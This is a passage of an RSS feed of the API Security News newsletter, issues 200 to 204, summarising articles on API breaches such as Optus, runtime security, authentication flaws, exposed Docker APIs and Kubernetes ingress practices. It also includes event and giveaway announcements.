<li>Only transmit the bare minimum of data to downstream providers, to prevent excessive leakage.</li>
<li>Use string encryption (such as TLS) to prevent information theft in transit.</li>
<li>Use standard and robust authentication schemes, such as OAuth2.</li>
<li>Implement object-level authorization checks at the code level to ensure finely-grained authorization control.</li>
<li>Use multi-factor authentication methods where possible.</li>
<li>Avoid using unknown browser extensions to prevent theft of PII and session cookies.</li>
</ul>
<p>It looks like the e-commerce sector has many of the same challenges that are familiar from other sectors — be sure to follow the recommendations above.</p>
<h2>Article: Five reasons you need API runtime security</h2>
<p>Next, we have the thoughts of NordicAPIs on <a href="https://nordicapis.com/5-reasons-you-need-api-runtime-security/" target="_blank" rel="noopener noreferrer">why API runtime security is important</a> as part of an overall API security strategy. The article highlights the tremendous value of a strong shift-left API security initiative. However, this on its own is not enough: the author also stresses the importance of complementing this approach with a shield-right strategy.</p>
<p>In summary, the author provides five main reasons why API runtime security (shield-right) is important:</p>
<ul>
<li>API testing tools cannot detect all business logic flaws.</li>
<li>Runtime security can protect API assets already in production, minimizing the risk of shadow or zombie APIs (circling back to our first piece this week).</li>
<li>Shield-right provides immediate cover for internal APIs that end up re-purposed for public, external use.</li>
<li>Third-party or COTS APIs cannot easily be modified to eliminate security flaws.</li>
<li>Even a perfectly secure API can be abused ( again, as discussed in the first article).</li>
</ul>
<p>In my opinion, the combination of a shift-left, shield-right strategy provides the best of both worlds.</p>
<h2>Article: API penetration testing</h2>
<p>Finally, we have a popular topic for readers of this newsletter, namely API penetration testing. This quick read calls out <a href="https://www.virtuesecurity.com/api-penetration-testing/" target="_blank" rel="noopener noreferrer">the differences between web application pentesting versus API pentesting</a> — the author&#8217;s view is that they are significantly different. Organizations should employ specialist skills and techniques for API pentesting.</p>
<p>The author emphasizes the importance of correctly scoping the API pentest, taking into consideration the following:</p>
<ul>
<li>Deciding if a client is necessary to generate and send requests to the API, is a dedicated test fixture necessary or can an existing client be used?</li>
<li>Understanding what API documentation exists and what can be provided.</li>
<li>Understanding roles, authentication methods, and API design.</li>
</ul>
<p>If you want to know more about API security penetration testing, it is worth <a href="https://42crunch.com/hacking-apis-for-fun-and-profit/" target="_blank" rel="noopener noreferrer">watching the webinar</a> I hosted on the topic last week with FORTBRIDGE.</p>
<h2>Event: 42Crunch at API World 2022</h2>
<p>API World is the world&#8217;s largest vendor-neutral API-specific conference, and this year it takes place in San Jose from the 25th to the 27th of October.</p>
<p>Join Isabelle Mauny (co-founder and Field CTO of 42Crunch) at the conference where she will be presenting on:</p>
<ul>
<li>API Security 101: Top API Vulnerabilities and How to Address Them</li>
<li>How a Combined Shift-Left and Shield-Right Approach Delivers End-To-End API Security</li>
</ul>
<p><a href="https://embed.emamo.com/event/api-world-ai-devworld-2022/r/speaker/colin-domoney" target="_blank" rel="noopener noreferrer"><img loading="lazy" decoding="async" class="alignnone wp-image-10075" src="https://apisecurity.io/wp-content/uploads/2022/10/Article5.jpg" alt="" width="610" height="275" /></a></p>
<p>&nbsp;</p>
<p>The post <a href="https://apisecurity.io/issue-204-api-attacks-on-shadow-apis-pii-leaks-from-e-commerce-apis-api-runtime-security/">Issue 204: API attacks on shadow APIs, PII leaks from e-commerce APIs, API runtime security</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 203: Optus data breach, API security guide, AuthN/AuthZ vulnerabilities</title>
		<link>https://apisecurity.io/issue-203-optus-data-breach-api-security-guide-authn-authz-vulnerabilities/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Fri, 07 Oct 2022 11:58:18 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=10071</guid>

					<description><![CDATA[<p>This week, the main news is coverage of the huge data breach affecting the Australian telecommunications company Optus, with APIs as a likely root cause. We also have articles on API security, authentication and authorization vulnerabilities, and how Docker REST API exposure can present risks. Breach: APIs at the root of Optus data breach? The [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-203-optus-data-breach-api-security-guide-authn-authz-vulnerabilities/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-203-optus-data-breach-api-security-guide-authn-authz-vulnerabilities/">Issue 203: Optus data breach, API security guide, AuthN/AuthZ vulnerabilities</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, the main news is coverage of the huge data breach affecting the Australian telecommunications company Optus, with APIs as a likely root cause. We also have articles on API security, authentication and authorization vulnerabilities, and how Docker REST API exposure can present risks.</p>
<h2>Breach: APIs at the root of Optus data breach?</h2>
<p>The big news over the last two weeks has been the data breach at the Australian telco Optus. At least 2.1m Optus account holders had at least one form of ID exposed, with at least 150,000 passports and 50,000 Medicare numbers stolen. Although full details are unknown at the time of writing, <a href="https://ia.acs.org.au/article/2022/the-aftermath-of-the-optus-breach.html" target="_blank" rel="noopener noreferrer">initial reports indicate</a> that unauthenticated API endpoints may have been at the root of the breach.</p>
<p>As is often the case, the breach was not an act of super sophisticated attackers using advanced methods — anyone with the ability to exercise an API would have been able to execute an attack.</p>
<p>The article highlights some of the key findings known thus far:</p>
<ul>
<li>The API had no rate-limiting, allowing the attacker to exfiltrate huge amounts of data.</li>
<li>The API had apparently never been pen tested before it was deployed.</li>
<li>Most surprisingly, the API appeared to be unauthenticated — a rather severe case of <a href="https://apisecurity.io/encyclopedia/content/owasp/api2-broken-authentication" target="_blank" rel="noopener noreferrer">API2:2019 — Broken authentication</a>.</li>
<li>Optus did not appear to classify their data according to sensitivity, nor did they implement any reasonable data retention policy.</li>
<li>Optus did also not use any form of data masking with confidential information.</li>
<li>The Optus network and endpoints were not actively monitored to detect malicious activity.</li>
</ul>
<p>The author makes several excellent recommendations. Firstly, similar to payment gateways for sensitive payment information, a personal information gateway should be used to protect PII. Secondly, data handling, classification, and retention policies should be specified and mandated for all organizations.</p>
<p>From an API perspective, I would also suggest that following even the most basic API security best practices would have entirely eliminated the API-related issues in this breach.</p>
<h2>Article: API security guide</h2>
<p>API security guides and best practices are always popular with readers of the newsletter, and <a href="https://www.keycdn.com/blog/api-security" target="_blank" rel="noopener noreferrer">this week we have a great one</a> from Ben Eaton.</p>
<p>Eaton gives a great discussion on why API security differs from web application security, and thus why your tools and methods may not be suited to API security. The key differences are:</p>
<ul>
<li>The traditional network perimeter is being eroded primarily by APIs and network controls no longer offer the same levels of protection.</li>
<li>For web applications, a client uses a web browser that a WAF can validate. However, with APIs, there is no standard client, meaning that client enforcement is difficult — this makes it more difficult to distinguish between expected behavior and bot attacks or DDoS attacks.</li>
<li>Attacks cannot easily be detected by examining incoming requests payloads.</li>
<li>Frequently changing incoming request formats present challenges to creating WAF rules.</li>
</ul>
<p>A useful guide and one worth bookmarking.</p>
<h2>Article: Authentication and authorization vulnerabilities</h2>
<p>Another popular topic with our readers is authentication and authorization best practices. An <a href="https://www.scmagazine.com/native/application-security/common-authentication-and-authorization-vulnerabilities-and-how-to-avoid-them" target="_blank" rel="noopener noreferrer">interesting article from SC Magazine</a> covers some of the common reasons for authentication and authorization vulnerabilities.</p>
<p>The article takes a broad view of the types of vulnerabilities, starting with basic coding errors, such as insecure value comparisons (like equality testing) and path-based authorization vulnerabilities. Another common pitfall is the lack of a trusted authorization source: developers need to make an authorization decision when clearly this decision should be made elsewhere, by a central enforcement point. To continue the list of usual suspects, there are also <a href="https://apisecurity.io/encyclopedia/content/owasp/api5-broken-function-level-authorization" target="_blank" rel="noopener noreferrer">API5:2019 — Broken function level authorization</a> and token mismanagement.</p>
<p>The article provides excellent guidance on how to eliminate many of these vulnerabilities, such as:</p>
<ul>
<li>Incorporate access control into the API lifecycle as early as possible.</li>
<li>Implement access control at the application level, rather than at the server level.</li>
<li>Review the code of critical code paths in access control logic.</li>
<li>Use specialized libraries for access control rather than implementing your own bespoke logic.</li>
<li>Check any an all access control on third-party infrastructure.</li>
</ul>
<p>Some interesting takes on a familiar topic.</p>
<h2>Article: Docker REST API exposure presents risks</h2>
<p>AS our last piece this week, we have coverage of the <a href="https://www.darkreading.com/cloud/teamtnt-docker-containers-malicious-cloud-images" target="_blank" rel="noopener noreferrer">risk that exposed Docker REST API endpoints can present</a>, courtesy of Dark Reading.</p>
<p>Researchers at TrendMicro placed a Docker &#8220;honeypot&#8221; on the internet, leaving an exposed REST API endpoint. Among their findings were the activities of a well-known hacker collective <cite>TeamTNT</cite> who performed three different types of exploits. The researchers found that attackers hosted a malicious container image that contained rootkits, kits for Docker container escape, the XMRig Monero coin miner, credential stealers, and Kubernetes exploit kits.</p>
<p>As the result of their experiment, the authors recommend restricting Docker REST API endpoints to only local networks or trusted sources. They also recommend employing Docker hardening guidelines and ensuring that passwords are not stored in cleartext.</p>
<p>Docker is a powerful developer tool but presents a new attack surface. As the report concludes:</p>
<blockquote class="blockquote"><p><em>&#8220;Developer-centric tools like Docker have been known to be abused extensively. It’s important to educate [developers] at large by creating policies for access and credential use, as well as generate threat models of their environments&#8221;</em></p></blockquote>
<h2>Event: 42Crunch at API World 2022</h2>
<p>API World is the world&#8217;s largest vendor-neutral API-specific conference, and this year it takes place in San Jose from the 25th to the 27th of October. Join Isabelle Mauny (co-founder and Field CTO of 42Crunch) at the conference where she will be presenting on:</p>
<ul>
<li>API Security 101: Top API Vulnerabilities and How to Address Them</li>
<li>How a Combined Shift-Left and Shield-Right Approach Delivers End-To-End API Security</li>
</ul>
<p><a href="https://embed.emamo.com/event/api-world-ai-devworld-2022/r/speaker/colin-domoney" target="_blank" rel="noopener noreferrer"><img loading="lazy" decoding="async" class="alignnone wp-image-10075" src="https://apisecurity.io/wp-content/uploads/2022/10/Article5.jpg" alt="" width="610" height="275" /></a></p>
<p>&nbsp;</p>
<p>The post <a href="https://apisecurity.io/issue-203-optus-data-breach-api-security-guide-authn-authz-vulnerabilities/">Issue 203: Optus data breach, API security guide, AuthN/AuthZ vulnerabilities</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 202: Six top API security risks, why APIs have no clothes, and a guide on API security testing</title>
		<link>https://apisecurity.io/issue-202-six-top-api-security-risks-why-apis-have-no-clothes-and-a-guide-on-api-security-testing/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 14 Sep 2022 16:54:44 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=10047</guid>

					<description><![CDATA[<p>This week, we have an article on the six top API security risks being favored by attackers, an article on why your APIs have no clothes, a guide on API security testing to improve security and data confidentiality, and finally, news of API security testing training courses being off by @theXSSRat. Due to annual vacation, [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-202-six-top-api-security-risks-why-apis-have-no-clothes-and-a-guide-on-api-security-testing/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-202-six-top-api-security-risks-why-apis-have-no-clothes-and-a-guide-on-api-security-testing/">Issue 202: Six top API security risks, why APIs have no clothes, and a guide on API security testing</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we have an article on the six top API security risks being favored by attackers, an article on why your APIs have no clothes, a guide on API security testing to improve security and data confidentiality, and finally, news of API security testing training courses being off by @theXSSRat.</p>
<p>Due to annual vacation, there will be no APISecurity.io newsletter for the <strong>next two weeks</strong> — the next issue will be #203 on Thursday 6th October.</p>
<h2>Article: Six top API security risks favored by attackers</h2>
<p><a href="https://thehackernews.com/2022/09/6-top-api-security-risks-favored.html" target="_blank" rel="noopener noreferrer">The HackerNews has featured views</a> on the top six top API risks favored by attackers:</p>
<ul>
<li><strong>No API visibility and monitoring = risk</strong>: Without visibility to what API assets you own, it is impossible to assess the risk they present, nor are you able to adequately protect them. Make every effort to inventorize your APIs, manage their lifecycles, and ensure you are tracking and monitoring the data which the APIs handle.</li>
<li><strong>API incompetence</strong>: Poor API design and implementation can lead to security risks.</li>
<li><strong>Service availability threats</strong>: Bot attacks are increasingly a threat against APIs, and protection (such as rate limiting or bot defenses) should be employed to prevent denial of service (DoS) attacks.</li>
<li><strong>Hesitating over API utilization</strong>: There is a fine line between rushing to release new business features and managing risks exposed by new APIs which may not have been adequately tested.</li>
<li><strong>API injection</strong>: As with web applications before them, APIs are vulnerable to injection attacks, such as SQL injection, command injection, or XML injection.</li>
<li><strong>Attacks against IoT devices through APIs</strong>: IoT devices rely on APIs for interconnection, and these APIs may be vulnerable or not actively maintained and updated.</li>
</ul>
<p>While some of these risks are well understood, I found the topic of API utilization an interesting one — how to balance risk versus business opportunity.</p>
<h2>Article: Your APIs have no clothes</h2>
<p>This week, SecurityBoulevard has featured <a href="https://securityboulevard.com/2022/09/your-apis-have-no-clothes/" target="_blank" rel="noopener noreferrer">an interesting article on why APIs have no clothes</a> — APIs being the digital equivalent of the protagonist in the Hans Christian Andersen&#8217;s folktale The Emperor’s New Clothes. In the story, the emperor was exposed, but no one told him or was willing to do anything about it. Not so different from where you might find yourself with APIs.</p>
<p>The first challenge to API security the author highlights is presented by the disappearing perimeter. Organizations can no longer rely on perimeter protections, such as firewalls, to protect their assets. The adoption of cloud technology and PaaS has meant that the external perimeter is largely eroded. Instead, the focus needs to move to protect the API endpoints themselves by using advanced authentication like multi-factor authentication (MFA), and monitoring multiple levels of the network to identify attacks.</p>
<p>As ever, the lack of cybersecurity talent and skills only exacerbates the problem, and nowhere is this more acutely felt than with APIs. Many of the lessons learned with protecting web applications no longer apply to APIs, and teams need to learn new skills or adapt their methods to protect APIs.</p>
<p>To remedy this and get your APIs covered, the author suggests going back to the basics in protecting APIs, namely:</p>
<ul>
<li>Authentication</li>
<li>Auditing and logging</li>
<li>Encryption</li>
</ul>
<h2>Article: API security testing to improve security and data confidentiality</h2>
<p>Next we have <a href="https://globeecho.com/business/api-security-testing-how-to-secure-apis-and-ensure-data-confidentiality/" target="_blank" rel="noopener noreferrer">an article on how API security testing can improve the security of an API</a> as well as its data confidentiality. Although hardly a comprehensive guide to the topic, the author does suggest three different approaches.</p>
<p>Firstly, you can utilize a pentesting company specializing in API pentesting and with the skills and experience to identify API-specific vulnerabilities. Typically, such suggested skills include detecting broken authentication and authorization, business logic testing, payment manipulation testing, security misconfiguration, and injection attacks.</p>
<p>Alternatively, you could turn to API-specific tooling. The author suggests two tools, both with slightly different testing approach:</p>
<ul>
<li><em>Assertible</em> can perform automated testing against APIs <em>after</em> they have been deployed, to check that they operate correctly and if they include any vulnerabilities. This testing approach focuses on the underlying API definition and its details.</li>
<li><em>Apache JMeter</em> is a web application load testing framework that can be utilize to perform load and fuzz testing of APIs. The focus of the testing is more on incoming requests and traffic load as well as error handling.</li>
</ul>
<p>Of course, going with one of these approaches does not close the door on the others. One could argue that — resources willing — the most all-round security would be achieved with the combination of the three: use tools to check the quality of your API definition and its implementation to fix the more basic issues, then take advantage of the human ingenuity and thinking outside box by the specialist pentesters to uncover potential attack vectors that mere tools might not be able to find.</p>
<h2>Training: API security testing training courses from @theXSSrat</h2>
<p>Finally this week, the popular pentesting trainer<a href="https://twitter.com/theXSSrat" target="_blank" rel="noopener noreferrer"> @theXSSrat</a> has announced that <a href="https://twitter.com/theXSSrat/status/1568889576487354368" target="_blank" rel="noopener noreferrer">new courses are available</a> on Udemy, covering the following topics:</p>
<ul>
<li>OWASP ZAP For Pentesting And Bug Bounties From Scratch</li>
<li>API Security Testing Guide</li>
<li>Uncle Rat&#8217;s XXE Handbook</li>
<li>Broad Scope Bug Bounties From Scratch</li>
</ul>
<p>Udemy is currently offering some courses for free or at heavily discounted prices. &#8220;Uncle Rat&#8221; aka. Wesley has a very entertaining presentation style, and I&#8217;d highly recommend any of his training content.</p>
<p>The post <a href="https://apisecurity.io/issue-202-six-top-api-security-risks-why-apis-have-no-clothes-and-a-guide-on-api-security-testing/">Issue 202: Six top API security risks, why APIs have no clothes, and a guide on API security testing</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 201: API security in Kubernetes, Corey Ball podcast, broken access controls for APIs, 200th issue prize giveaway</title>
		<link>https://apisecurity.io/issue-201-api-security-kubernetes-corey-ball-podcast-broken-access-controls-apis-200th-issue-prize-giveaway/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Fri, 09 Sep 2022 16:35:28 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=10025</guid>

					<description><![CDATA[<p>This week, we have an article from the NewStack on API security best practices in Kubernetes, a podcast with Corey Ball discussing API security best practices, an article on broken access control concerns in APIs, and 42Crunch&#8217;s eBook on API security. Most importantly, we have news of last week&#8217;s winner in the 200th-issue giveaway and [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-201-api-security-kubernetes-corey-ball-podcast-broken-access-controls-apis-200th-issue-prize-giveaway/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-201-api-security-kubernetes-corey-ball-podcast-broken-access-controls-apis-200th-issue-prize-giveaway/">Issue 201: API security in Kubernetes, Corey Ball podcast, broken access controls for APIs, 200th issue prize giveaway</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we have an article from the NewStack on API security best practices in Kubernetes, a podcast with Corey Ball discussing API security best practices, an article on broken access control concerns in APIs, and 42Crunch&#8217;s eBook on API security. Most importantly, we have news of last week&#8217;s winner in the 200th-issue giveaway and news on this week&#8217;s giveaway.</p>
<h2>Article: Best practices for API security in Kubernetes</h2>
<p>First up this week is <a href="https://thenewstack.io/best-practices-for-api-security-in-kubernetes/" target="_blank" rel="noopener noreferrer">guidance from the team at Curity</a> on best practices for API security in Kubernetes.</p>
<p>The article focuses on the role of the ingress controller in securing Kubernetes API-based implementations. The first recommendation is to <strong>provide a single point of entry</strong> to the pods in a cluster. While exposing pod ports via services is possible, this approach lacks flexibility and scalability. A more robust approach is to leverage the ingress controller to provide a richer array of enterprise features, such as name-based virtual hosts, path mapping, proxying, caching, and security features such as authentication and TLS termination. The author recommends the NGINX Ingress Controller, Kong Ingress Controller, or the Tyk Operator. I&#8217;ve had great success with the Traefik Ingress Controller.</p>
<p>The second recommendation is to <strong>restrict access,</strong> and the ingress controller is ideally suited to enforcing authentication and authorization at a central point. Using standard protocols such as OAuth 2.0 or OpenID Connect, the ingress controller can validate the tokens at the perimeter and can perform coarse-grained access control. Primarily the ingress controller can offload the task of token validation from the API backend.</p>
<p>Finally, a security truism — <strong>trust no one</strong>. The author describes the Phantom Token approach to prevent exposing JWTs containing sensitive data outside of the cluster. By using a full-featured ingress controller, Phantom Tokens can be implemented via scripts or plugins.</p>
<p>Thanks to the Curity team for this great read.</p>
<h2>Podcast: Corey Ball on API security best-practices</h2>
<p>Our good friend Corey Ball (aka. @<a href="https://twitter.com/hAPI_hacker" target="_blank" rel="noopener noreferrer">hAPI_hacker</a>) was<a href="https://cloudsecuritypodcast.tv/listen-to-the-episodes/api-security-best-practices-2022/" target="_blank" rel="noopener noreferrer"> featured in the latest Cloud Security Podcast</a> with Ashish Rajan. Most readers will be familiar with Corey&#8217;s &#8220;Hacking APIs&#8221; book, this is a good listen covering topics such as:</p>
<ul>
<li>What is API security, and why is it important in 2022?</li>
<li>What are people doing wrong with APIs?</li>
<li>Most surprising things being seen in API Security?</li>
<li>Learn about API hacking</li>
<li>Which APIs should be public?</li>
</ul>
<p>Thanks to both Corey and Ashish for their contribution to the community.</p>
<h2>Article: Broken access control concern for APIs</h2>
<p>As readers of this newsletter are only too well aware, broken access control is a persistent problem for APIs. This week <a href="https://infosecwriteups.com/why-broken-access-control-is-the-most-severe-vulnerability-2223baf9bb48" target="_blank" rel="noopener noreferrer">InfosecWriteups provided an unusual take</a> on this all too familiar topic.</p>
<p>The article focuses on both broken function level and object level authorization. For me, the most interesting (and oft-overlooked) cause of broken authorization is a combination of trust in client-side parameters or values. By definition, some state history must be maintained on the client-side, and this state can easily be modified by an attacker. If the server-side doesn&#8217;t fully validate incoming requests by re-authorizing (or at least re-validating), it may place blind trust in easily modifiable input. As per the first article — <strong>trust no one</strong>.</p>
<p>The recommendations to protect against broken authorization are twofold:</p>
<ul>
<li>Always re-validate access to records rather than assuming access based on an existing authenticated session.</li>
<li>Use a single point of enforcement for authorization.</li>
</ul>
<h2>eBook: 42Crunch ebook on API Security</h2>
<p>This week 42Crunch <a href="https://42crunch.com/ebook-api-security-blueprint/" target="_blank" rel="noopener noreferrer">released their eBook on API Security</a> which is intended as a comprehensive guide to the breadth and scope of API security. The guide is aimed at those getting to grips with API security who want an orientation, a set of practical recommendations, and a path to success. The guide covers the six main domains of API security: inventory, design, development, testing, protection, and governance.</p>
<p>Our intent in creating the eBook was to demystify the topic of API security — too often, we encounter concerns that &#8220;we don&#8217;t know where to start&#8221; or &#8220;we don&#8217;t know what good looks like.&#8221; Building any security program is like eating an elephant — one piece at a time. Start small, prioritize sensibly, iterate quickly, learn lessons and shift the dial. Knowing where you are is vital, as is knowing your destination.</p>
<p><a href="https://42crunch.com/ebook-api-security-blueprint/" target="_blank" rel="noopener noreferrer"><img loading="lazy" decoding="async" class="alignnone wp-image-10032" src="https://apisecurity.io/wp-content/uploads/2022/09/Article6.jpg" alt="" width="602" height="347" /></a></p>
<h2>Our 200th issue prize giveaway</h2>
<p>The winner of last week&#8217;s 200th issue prize giveaway is <em>Dan O&#8217;Reilly @ Ford Motor Company</em>. Congratulations Dan!</p>
<p>For this week&#8217;s giveaway, we&#8217;d love you to either download the API security eBook or share the link on your social media. Just remember to tag me (<a href="https://twitter.com/colindomoney" target="_blank" rel="noopener noreferrer">@colindomoney</a>) when you do, and we&#8217;ll announce the winner next week.</p>
<p><a href="https://www.linkedin.com/posts/danieloreilly_colin-domoney-i-really-enjoy-the-apisecurityio-activity-6971526146253307904-WoXw?utm_source=share&amp;utm_medium=member_desktop" target="_blank" rel="noopener noreferrer"><img loading="lazy" decoding="async" class="alignnone wp-image-10027" src="https://apisecurity.io/wp-content/uploads/2022/09/Article5.jpg" alt="" width="596" height="682" /></a></p>
<p>The post <a href="https://apisecurity.io/issue-201-api-security-kubernetes-corey-ball-podcast-broken-access-controls-apis-200th-issue-prize-giveaway/">Issue 201: API security in Kubernetes, Corey Ball podcast, broken access controls for APIs, 200th issue prize giveaway</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 200: Injection vulnerability in BitBucket, OAuth2 exploitation, and 200th issue prize giveaways</title>
		<link>https://apisecurity.io/issue-200-injection-vulnerability-in-bitbucket-oauth2-exploitation-and-200th-issue-prize-giveaways/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Thu, 01 Sep 2022 15:50:02 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=9983</guid>

					<description><![CDATA[<p>Celebrating the 200th issue This week is a special one: it&#8217;s the 200th edition of this newsletter, and also my first anniversary as the curator. To celebrate, I have pulled out our three most popular articles and our three most popular guides, in case you missed them the first time around. We&#8217;ve also got views [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-200-injection-vulnerability-in-bitbucket-oauth2-exploitation-and-200th-issue-prize-giveaways/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-200-injection-vulnerability-in-bitbucket-oauth2-exploitation-and-200th-issue-prize-giveaways/">Issue 200: Injection vulnerability in BitBucket, OAuth2 exploitation, and 200th issue prize giveaways</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p><img loading="lazy" decoding="async" class="alignnone wp-image-9985" src="https://apisecurity.io/wp-content/uploads/2022/08/APISecurity-42C-Email-Header-900x128px-200-edition.png" alt="Happy 200 OK issue of the APIsecurity.io newsletter!" width="1017" height="146" /></p>
<h2>Celebrating the 200th issue</h2>
<p>This week is a special one: it&#8217;s the 200th edition of this newsletter, and also my first anniversary as the curator. To celebrate, I have pulled out our three most popular articles and our three most popular guides, in case you missed them the first time around. We&#8217;ve also got views from several industry leaders on the state of API security in late 2022, and — most importantly — news of our giveaways running weekly through September.</p>
<p>Before diving in, I would like to thank a few people that make this newsletter what it is today:</p>
<ul>
<li>My predecessor as the curator, Dmitry Sotnikov.</li>
<li>The founders at 42Crunch for their vision and support in sponsoring this newsletter.</li>
<li>My long-suffering co-editor and marketing team at 42Crunch.</li>
<li>The numerous experts and visionaries in the field of API security who contribute their thoughts and expertise to our benefit.</li>
<li>The pentesters and researchers who detail their disclosures in painstaking detail so that we all can learn from their unique skills.</li>
<li>And most importantly, to the subscribers and followers of this newsletter who regularly give me such positive feedback. This newsletter is for you; this feedback means the world to me.</li>
</ul>
<p>Without further ado, here are the details of the prize giveaway for the first week: all you have to do to enter is to create a social media post on Twitter or LinkedIn mentioning this newsletter and tag me (<a href="https://twitter.com/colindomoney" target="_blank" rel="noopener noreferrer">@colindomoney</a>) in your post. We&#8217;ll choose the winner based on originality, creativity, and impact, and will announce the winner and the prize next week. Get those thinking hats on and get posting! If you&#8217;re running an API security project, feel free to tag that in as well.</p>
<hr />
<h2>Our top three articles</h2>
<p>We&#8217;ve had some fantastic articles in the last year, and it was hard to pick the top three. However, based on the reader engagement and value to the community, I&#8217;ve picked the following:</p>
<ul>
<li><strong>In third place</strong> is the vulnerability disclosure from Pen Test Partners (<a href="https://apisecurity.io/issue-171-dpd-parcel-tracking-flaw-apache-pulsar-casdoor-vulnerabilities-trends-api-industry/" target="_blank" rel="noopener noreferrer">featured in issue 171</a>) of a DPD parcel tracking website flaw that may have exposed customer data. I loved this article because of the relative simplicity of the attack method, coupled with the vulnerability&#8217;s potential impact. Don&#8217;t rely on security by obscurity, and always rate-limit endpoints that can be fuzzed.</li>
<li><strong>In second place</strong> is the beautifully written write-up (<a href="https://apisecurity.io/issue-148-microsoft-power-apps-breach-bola-topcoder-portal-rfc-9101-released-api-hacking-guide-2/" target="_blank" rel="noopener noreferrer">featured in issue 149</a>) of the various geolocation vulnerabilities in the Bumble dating app. I loved this article because of the ingenuity of the various attack techniques and the way they were chained to totally &#8220;own&#8221; the app. It&#8217;s also absolutely hilarious — kudos to Robert Heaton (<a href="https://twitter.com/RobJHeaton" target="_blank" rel="noopener noreferrer">@RobJHeaton</a>) for this contribution.</li>
<li><strong>In the first place,</strong> by some margin, is the stellar vulnerability write-up from our friends at Fortbridge (<a href="https://apisecurity.io/issue-187-rce-and-api-vulnerability-in-oas-platform-account-takeover-in-yunmai-smart-scale/" target="_blank" rel="noopener noreferrer">featured in issue 187</a> and <a href="https://fortbridge.co.uk/research/mass-account-takeover-yunmai/" target="_blank" rel="noopener noreferrer">on their blog</a>) describing a mass account takeover in the Yunmai smart scale API. Not only is the write-up impeccably written and illustrated, but it highlights perfectly how several benign flaws can allow skilled attackers to compromise a system. Kudos to the team at Fortbridge (<a href="https://twitter.com/fortbridge1?lang=en" target="_blank" rel="noopener noreferrer">@FORTBRIDGE1</a>) for this fine work.</li>
</ul>
<hr />
<h2>Our top three guides</h2>
<p>Aside from news on API vulnerabilities, guides on API security are also a recurring topic in this newsletter. Again, based on the reader engagement, the following stand out:</p>
<ul>
<li><strong>In third place</strong>, I&#8217;m pleased to have my own guide to REST API security (<a href="https://apisecurity.io/issue-179-spring4shell-zero-day-cri-o-container-runtime-vulnerability-and-rest-api-security-reference/" target="_blank" rel="noopener noreferrer">featured in issue 179</a> and on the <a href="https://dzone.com/refcardz/rest-api-security-1" target="_blank" rel="noopener noreferrer">DZone website</a>). Thanks to DZone for their help and for the many kind words I&#8217;ve received. If I&#8217;ve missed anything important, give me a shout, and I&#8217;ll get it into the next revision.</li>
<li><strong>In second place</strong> is the very popular API testing checklist (<a href="https://apisecurity.io/issue-194-api-testing-checklist-api-security-testing-resources-cvss-for-api-security/" target="_blank" rel="noopener noreferrer">featured in issue 194</a>) from Latish Danawale. This is a really comprehensive list of things to check when testing an API, and the author&#8217;s vast experience makes this a favorite with our readers.</li>
<li><strong>In the first place </strong>is the evergreen (and ever popular) &#8220;Awesome API security&#8221; guide from André Rainho (<a href="https://apisecurity.io/issue-162-compromised-googe-cloud-accounts-graphql-as-api-gateway-api-security-guide-and-training/" target="_blank" rel="noopener noreferrer">featured in issue 162</a> and <a href="https://github.com/arainho/awesome-api-security" target="_blank" rel="noopener noreferrer">on GitHub</a>). This is the first place any aspiring API security <em>aficionado</em> should go to find API security resources, from guides and how-tos right through to tools and hacking skills. Kudos to André (<a href="https://twitter.com/arainho_it" target="_blank" rel="noopener noreferrer">@arainho_it</a>) for this invaluable community resource.</li>
</ul>
<hr />
<h2>Views from the industry experts</h2>
<p>Here are some quotes from some of the well-known names in API security on where they see API security to be at and where it seems to be headed (and perhaps a bit about this newsletter, too):</p>
<p><img loading="lazy" decoding="async" class="size-full wp-image-7249 alignnone" src="https://apisecurity.io/wp-content/uploads/2020/09/jim-mancino.jpg" alt="" width="150" height="150" /></p>
<p><cite>&#8220;Over the last 2 years, microservices have continued to dominate as the primary paradigm for API development. The importance of managing JWT tokens, as well as OAuth2 and OIDC endpoints has only increased. The risk of API-centric attacks like Server Side Request Forgery (SSRF) has only increased. The need to secure cloud infrastructure has only increased. The issues are similar from 2 years ago, but the trends call for us to do better in keeping these API risks at bay.&#8221;</cite></p>
